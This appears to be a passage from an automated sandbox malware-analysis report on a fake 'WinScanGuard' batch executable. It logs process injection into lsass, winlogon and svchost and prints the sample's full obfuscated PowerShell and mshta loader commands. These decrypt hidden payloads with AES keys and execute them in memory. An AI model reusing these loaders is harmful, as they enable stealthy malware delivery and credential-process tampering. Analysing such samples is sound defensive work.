              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: BD8008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 4984A9010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 4EA1005010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 8D7008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 7E9008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: F980ACF010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: DB297B010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 3195008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 31C1008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 86602A3010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 28A008Jump to behavior
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4000000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 20E0000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23C0000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 28542880000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5A40000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 32E0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1D0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC6F0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B70000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661390000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF200000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A879C0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2F90000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2230000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23E0000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1450000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC7B0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0C30000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661450000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAB14E0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87F70000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 179537D0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D590000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25306E60000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC750000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0BD0000
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6613F0000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3200000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2250000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2400000
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1470000
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeThread register set: target process: 4916Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeThread register set: target process: 1228Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 1908Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 5800Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 2740Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 6720Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 6700Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 6020Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 5408Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "winscanguard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function olsgt($qhqwz){ $fhdgh=[system.security.cryptography.aes]::create(); $fhdgh.mode=[system.security.cryptography.ciphermode]::cbc; $fhdgh.padding=[system.security.cryptography.paddingmode]::pkcs7; $fhdgh.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('onjsi5fjjzv4aoembvugvr4ituuvmgvnrnjejyrp0wq='); $fhdgh.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('clqnywl0vsdfd4x+5ykrxq=='); $spflb=$fhdgh.createdecryptor(); $return_var=$spflb.transformfinalblock($qhqwz, 0, $qhqwz.length); $spflb.dispose(); $fhdgh.dispose(); $return_var;}function rnhms($qhqwz){ $wxvgk=new-object system.io.memorystream(,$qhqwz); $bpcbe=new-object system.io.memorystream; $couvu=new-object system.io.compression.gzipstream($wxvgk, [io.compression.compressionmode]::decompress); $couvu.copyto($bpcbe); $couvu.dispose(); $wxvgk.dispose(); $bpcbe.dispose(); $bpcbe.toarray();}function zatie($qhqwz,$cjuqy){ $ospmd=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$qhqwz); $xwtdt=$ospmd.entrypoint; $xwtdt.invoke($null, $cjuqy);}$ylwdr=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\winscanguard_v.2.1.bat').split([environment]::newline);foreach ($xuiqg in $ylwdr) { if ($xuiqg.startswith('seroxen')) { $sogsv=$xuiqg.substring(7); break; }}$zermu=[string[]]$sogsv.split('\');$tzgbc=rnhms (olsgt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($zermu[0])));$ttdxt=rnhms (olsgt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($zermu[1])));zatie $ttdxt (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));zatie $tzgbc (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));
              Source: unknownProcess created: C:\Windows\$sxr-mshta.exe c:\windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'vb'+'sc'+'ri'+'pt'+'\x22>'+'se'+'t\x20'+'ob'+'js'+'he'+'ll'+'\x20='+'\x20c'+'re'+'at'+'eo'+'bj'+'ec'+'t('+'\x22w'+'sc'+'ri'+'pt'+'.s'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'sh'+'el'+'l.'+'ru'+'n\x20'+'\x22c:\\windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bwtljbkboghiyuerhoar4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe c:\windows\$sxr-powershell.exe -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command function zxowg($ygfcs){ $hjbvm=[system.security.cryptography.aes]::create(); $hjbvm.mode=[system.security.cryptography.ciphermode]::cbc; $hjbvm.padding=[system.security.cryptography.paddingmode]::pkcs7; $hjbvm.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc='); $hjbvm.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w=='); $shnyr=$hjbvm.('rotpyrcedetaerc'[-1..-15] -join '')(); $ptorz=$shnyr.('kcolblanifmrofsnart'[-1..-19] -join '')($ygfcs, 0, $ygfcs.length); $shnyr.dispose(); $hjbvm.dispose(); $ptorz;}function miajr($ygfcs){ $vhzij=new-object system.io.memorystream(,$ygfcs); $mkycr=new-object system.io.memorystream; $pphyy=new-object system.io.compression.gzipstream($vhzij, [io.compression.compressionmode]::decompress); $pphyy.copyto($mkycr); $pphyy.dispose(); $vhzij.dispose(); $mkycr.dispose(); $mkycr.toarray();}function dettm($ygfcs,$ztwie){ $mzolj=[system.reflection.assembly]::load([byte[]]$ygfcs); $lofyp=$mzolj.entrypoint; $lofyp.invoke($null, $ztwie);}$hjbvm1 = new-object system.security.cryptography.aesmanaged;$hjbvm1.mode = [system.security.cryptography.ciphermode]::cbc;$hjbvm1.padding = [system.security.cryptography.paddingmode]::pkcs7;$hjbvm1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc=');$hjbvm1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w==');$ghtel = $hjbvm1.('rotpyrcedetaerc'[-1..-15] -join '')();$tsruf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('/drqfgtkhdxyibtyp3tlyq==');$tsruf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tsruf, 0, $tsruf.length);$tsruf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tsruf);$tbgvf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('uyheuy/+hnwqeclfyb1fduqtqym+nhvdwwfjekkh6lu=');$tbgvf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tbgvf, 0, $tbgvf.length);$tbgvf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tbgvf);$mjwsq = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('v2s4nwnxvxtvxwhesswniq==');$mjwsq = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($mjwsq, 0, $mjwsq.length);$mjwsq = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($mjwsq);$ibfkh = [system.convert]::('gnirts46esabmorf'[-1..-16] -join 